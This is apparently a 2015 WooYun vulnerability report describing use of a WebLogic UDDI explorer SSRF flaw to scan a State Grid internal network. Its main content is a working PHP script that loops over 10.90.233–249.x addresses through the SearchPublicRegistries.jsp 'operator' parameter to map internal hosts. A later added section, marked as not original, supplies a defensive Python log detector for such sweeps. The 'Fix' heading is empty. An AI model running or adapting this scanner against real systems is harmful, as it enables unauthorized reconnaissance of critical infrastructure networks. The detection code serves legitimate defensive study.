How I Used a Certain Vulnerability to Scan the State Grid Intranet

2015-10-02 10:15


Proof of vulnerability:

Code section
cat web.php

<?php
for($m=233;$m<250;$m++){
    for($i=1;$i<254;$i++){
        $url="http://10.90.$m.".$i."/";
        expyou($argv[1],$url);
    }
}

expyou($argv[1],$argv[2]);

function expyou($target,$url){
    $result=file_get_contents("$target/uddiexplorer/SearchPublicRegistries.jsp?operator=$url&rdoSearch=name&txtSearchname=&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search");
    preg_match_all("#An error has occurred<BR>(.*?)</table#is",$result,$info);

    if(strpos($info[1][0],"but could not connect over HTTP to server")){
        echo "$url FUck closed\r\n";
    }else{
        echo $url.trim($info[1][0])."\r\n";
    }
}
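
Added example (not part of the original report): the script above sends every probe through the operator parameter of /uddiexplorer/SearchPublicRegistries.jsp, so a sweep like this leaves a distinctive pattern in the web access log of the WebLogic front end. The Python sketch below flags clients whose operator values name several distinct internal addresses; the common log format, the sample lines, and the min_targets threshold are assumptions.

```python
import ipaddress
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines (common log format); every address is made up.
SAMPLE_LOG = """\
203.0.113.7 - - [02/Oct/2015:10:01:00 +0800] "GET /uddiexplorer/SearchPublicRegistries.jsp?operator=http://10.0.0.1/&rdoSearch=name&btnSubmit=Search HTTP/1.1" 200 4310
203.0.113.7 - - [02/Oct/2015:10:01:01 +0800] "GET /uddiexplorer/SearchPublicRegistries.jsp?operator=http://10.0.0.2/&rdoSearch=name&btnSubmit=Search HTTP/1.1" 200 4310
203.0.113.7 - - [02/Oct/2015:10:01:02 +0800] "GET /uddiexplorer/SearchPublicRegistries.jsp?operator=http%3A%2F%2F10.0.0.3%2F&rdoSearch=name HTTP/1.1" 200 4287
198.51.100.9 - - [02/Oct/2015:10:05:00 +0800] "GET /uddiexplorer/SearchPublicRegistries.jsp?operator=http://uddi.example.com/inquiry&rdoSearch=name HTTP/1.1" 200 5120
198.51.100.9 - - [02/Oct/2015:10:05:03 +0800] "GET /index.jsp HTTP/1.1" 200 812
"""

REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')
JSP_PATH = "/uddiexplorer/searchpublicregistries.jsp"


def operator_target(request_uri):
    """Return the host named in the operator parameter, or None."""
    parts = urlsplit(request_uri)
    if parts.path.lower() != JSP_PATH:
        return None
    values = parse_qs(parts.query).get("operator")  # parse_qs also percent-decodes
    return urlsplit(values[0]).hostname if values else None


def is_internal(host):
    """True for literal private, loopback or link-local IP addresses."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False  # a hostname: resolve it separately if that matters to you
    return ip.is_private or ip.is_loopback or ip.is_link_local


def find_sweeps(log_text, min_targets=3):
    """Map client IP -> sorted internal targets, for clients naming >= min_targets."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue
        host = operator_target(match.group(2))
        if host and is_internal(host):
            seen[match.group(1)].add(host)
    return {c: sorted(t) for c, t in seen.items() if len(t) >= min_targets}


if __name__ == "__main__":
    for client, targets in find_sweeps(SAMPLE_LOG).items():
        print(client, "->", ", ".join(targets))
```
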

Fix:

Source: www.wooyun.org/bugs/wooyun-2015-0134123
